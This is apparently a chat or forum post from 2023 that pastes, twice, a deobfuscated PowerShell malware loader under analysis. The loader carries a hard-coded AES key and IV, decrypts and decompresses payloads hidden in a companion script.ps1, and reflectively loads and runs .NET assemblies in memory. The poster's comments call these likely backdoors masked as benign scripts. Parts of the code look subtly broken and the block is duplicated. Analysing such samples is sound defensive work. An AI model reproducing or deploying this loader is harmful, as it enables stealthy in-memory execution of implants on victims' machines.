hUwUtao · September 19, 2023 17:53
diff --git a/loader.ps1 b/loader.ps1
 # Deobfuscate strings
 $DecodeBase64 = {param($in) [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in))}
 $YdDd = 'GldVHetldVHCurldVHreldVHntPldVHroldVHceldVHssldVH'.Replace('ldVH', '').Split('|')
 # Deobfuscate function names
 $DecryptAES = 'ccbSO'
 $DecompressGzip = 'FYIcv'
 # Functions to decrypt and decompress code
 function ${DecryptAES}($payload){
  $aes = [System.Security.Cryptography.Aes]::Create()
  $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
  $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
  $aes.Key = [System.Convert]::FromBase64String('34lAyVlbw77ON9xSh1j1eo4jVjfrXHRRypmTO1BVv5U=')
  $aes.IV = [System.Convert]::FromBase64String('sclHJpu2svJEHkdRgZJIug==')
  $decryptor = $aes.CreateDecryptor()
  $result = $decryptor.TransformFinalBlock($payload, 0, $payload.Length)
  $decryptor.Dispose()
  $aes.Dispose()
  return $result
 }
 function ${DecompressGzip}($payload){
  $ms = New-Object System.IO.MemoryStream ,$payload
  $out = New-Object System.IO.MemoryStream
  $gzip = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
  $gzip.CopyTo($out)
  $gzip.Dispose()
  $ms.Dispose()
  $out.Dispose()
  return $out.ToArray()
 }
 # Read in script containing encrypted payloads
 $scriptPath = [System.IO.Path]::GetDirectoryName([System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName)
 $script = [System.IO.File]::ReadAllBytes("$scriptPath\script.ps1")
 # Decrypt and decompress payloads
 $payload1 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
    [System.Linq.Enumerable]::Aggregate($script,5, {param($s) $s.Substring(2)})) ))
 $payload2 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
    [System.Linq.Enumerable]::Aggregate($script,6, {param($s) $s.Substring(2)})) ))
 # Load payloads into memory and execute
 [System.Reflection.Assembly]::Load([byte[]]$payload1).EntryPoint.Invoke($null, $null)
 [System.Reflection.Assembly]::Load([byte[]]$payload2).EntryPoint.Invoke($null, $null)
 # Payloads appear to contain .NET assemblies that are reflectively loaded and executed
 # Likely malicious implants/backdoors masked as benign scripts (edited)
	# Deobfuscate strings
	$DecodeBase64 = {param($in) [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in))}
	$YdDd = 'GldVHetldVHCurldVHreldVHntPldVHroldVHceldVHssldVH'.Replace('ldVH', '').Split('\|')
	# Deobfuscate function names
	$DecryptAES = 'ccbSO'
	$DecompressGzip = 'FYIcv'
	# Functions to decrypt and decompress code
	function ${DecryptAES}($payload){
	$aes = [System.Security.Cryptography.Aes]::Create()
	$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
	$aes.Key = [System.Convert]::FromBase64String('34lAyVlbw77ON9xSh1j1eo4jVjfrXHRRypmTO1BVv5U=')
	$aes.IV = [System.Convert]::FromBase64String('sclHJpu2svJEHkdRgZJIug==')
	$decryptor = $aes.CreateDecryptor()
	$result = $decryptor.TransformFinalBlock($payload, 0, $payload.Length)
	$decryptor.Dispose()
	$aes.Dispose()
	return $result
	}
	function ${DecompressGzip}($payload){
	$ms = New-Object System.IO.MemoryStream ,$payload
	$out = New-Object System.IO.MemoryStream
	$gzip = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
	$gzip.CopyTo($out)
	$gzip.Dispose()
	$ms.Dispose()
	$out.Dispose()
	return $out.ToArray()
	}
	# Read in script containing encrypted payloads
	$scriptPath = [System.IO.Path]::GetDirectoryName([System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName)
	$script = [System.IO.File]::ReadAllBytes("$scriptPath\script.ps1")
	# Decrypt and decompress payloads
	$payload1 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
	[System.Linq.Enumerable]::Aggregate($script,5, {param($s) $s.Substring(2)})) ))
	$payload2 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
	[System.Linq.Enumerable]::Aggregate($script,6, {param($s) $s.Substring(2)})) ))
	# Load payloads into memory and execute
	[System.Reflection.Assembly]::Load([byte[]]$payload1).EntryPoint.Invoke($null, $null)
	[System.Reflection.Assembly]::Load([byte[]]$payload2).EntryPoint.Invoke($null, $null)
	# Payloads appear to contain .NET assemblies that are reflectively loaded and executed
	# Likely malicious implants/backdoors masked as benign scripts (edited)